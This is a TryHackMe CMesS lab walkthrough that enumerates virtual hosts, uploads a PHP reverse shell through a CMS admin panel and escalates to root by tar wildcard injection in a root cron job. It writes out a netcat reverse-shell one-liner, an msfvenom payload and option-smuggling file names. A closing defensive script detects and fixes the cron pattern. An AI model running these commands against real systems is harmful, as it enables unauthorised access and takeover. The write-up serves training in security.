Today we will take a look at TryHackMe: CMesS. Please try to understand each step and take notes.
Command: sudo nmap -sS -sC -sV -oN nmap/initial IP
Command: gobuster dir -u http://cmess.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Let’s look at the admin panel
I had no idea, until I thought of looking at subdomains (virtual hosts).
Command: ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm/ -H "Host: FUZZ.cmess.thm" -fw 522
Note: I used the "-fw" option to filter out the responses with the same word count (522), i.e. the default page that every non-existent host name returns.
When we look at the page, we find important information that we need to access the admin panel.
Boom. We are already on the panel. Let’s get the reverse shell.
Administration > Themes > Gila Blog (folder icon) > then go a few directories back up.
I put index.php myself to make it easier.
Let’s look at the home directory first.
Excellent. We need permission. It’s time to launch linpeas.sh. Let’s go to the /tmp folder.
For some reason, when I saw the file with the extension .tar.gz, I checked the crontab.
Excellent. But we have a problem. We don’t know Andre’s password.
Let’s start Linpeas.
Command: chmod +x linpeas.sh
Look at the results.
We found the password. Let’s go to the backup file
Day 67: Tar Cron 2 Root — Abusing Wildcards for Tar Argument Injection in root cronjob (Nix)
I researched various sources, but I used this one.
Let’s get the reverse shell.
Create the payload first.
Command: msfvenom -p cmd/unix/reverse_netcat lhost=IP lport=4444 R
Let’s go to the backup file, create the script and listen.
Command: echo "mkfifo /tmp/prrcdw; nc IP Port 0</tmp/prrcdw | /bin/sh >/tmp/prrcdw 2>&1; rm /tmp/prrcdw" > shell.sh
Command: echo "" > "--checkpoint-action=exec=sh shell.sh"
Command: echo "" > --checkpoint=1
Command: nc -nvlp 4444
And now we are root.
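The defender's side of the tar cron job abused above, as an added example that is not part of the original writeup or of the source it cites. It does two things: flags crontab lines where tar is fed a shell wildcard (the root cause, since the shell expands "*" into file names that tar then parses as options), and shows a backup invocation that passes tar a directory instead of an expanded glob, so a file named like an option is archived as data. The crontab text is constructed for this example; only the /home/andre/backup path and the tar.gz backup come from the writeup.

```shell
#!/bin/sh
# Added example (not from the writeup): audit and hardened form of the
# "tar with wildcard in a root cron job" pattern.

# Read crontab text on stdin and print the non-comment lines that run tar
# with a bare "*" argument somewhere after the tar command itself.
find_risky_tar_jobs() {
    grep -v '^[[:space:]]*#' | grep -E 'tar[[:space:]].*[[:space:]]\*([[:space:]]|$)'
}

# Count the risky lines in a constructed sample crontab. Line 2 is the
# writeup's pattern, line 3 is the same backup with the wildcard removed,
# line 4 is an unrelated job that must not be flagged. Expected: 1.
count_risky_in_sample() {
    printf '%s\n' \
      '# constructed sample /etc/crontab' \
      '*/2 * * * * root cd /home/andre/backup && tar -zcvf /tmp/backup.tar.gz *' \
      '*/2 * * * * root tar -zcvf /tmp/backup.tar.gz -C /home/andre/backup .' \
      '17 * * * * root cd / && run-parts --report /etc/cron.hourly' \
      | find_risky_tar_jobs | wc -l | tr -d ' '
}

# Hardened backup: "-C dir ." lets tar build the entry list itself, so no
# file name ever reaches tar's option parser via shell expansion.
safe_backup() {
    src="$1"; out="$2"
    tar -C "$src" -cf "$out" .
}

# Demo: archive a temp directory that contains a file whose name looks like
# a tar option and return how many archive members carry that name.
# With safe_backup it is stored as an ordinary member, so the answer is 1.
demo_option_named_file() {
    tmp=$(mktemp -d)
    mkdir "$tmp/src"
    echo data > "$tmp/src/notes.txt"
    : > "$tmp/src/--checkpoint=1"          # constructed option-looking name
    safe_backup "$tmp/src" "$tmp/backup.tar"
    n=$(tar -tf "$tmp/backup.tar" | grep -c -- '--checkpoint=1')
    rm -rf "$tmp"
    echo "$n"
}

echo "risky cron lines in sample: $(count_risky_in_sample)"
echo "option-named files stored as data: $(demo_option_named_file)"
```

To audit a real host, pipe the actual files through the check, e.g. `cat /etc/crontab /etc/cron.d/* | find_risky_tar_jobs`; any hit that points at a directory writable by a lower-privileged user is the same exposure this box has. The fix is the `safe_backup` form (or `find ... -exec`), plus not letting the cron job's working directory be user-writable.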
“If you have any questions or comments, please do not hesitate to write. Have a good day.”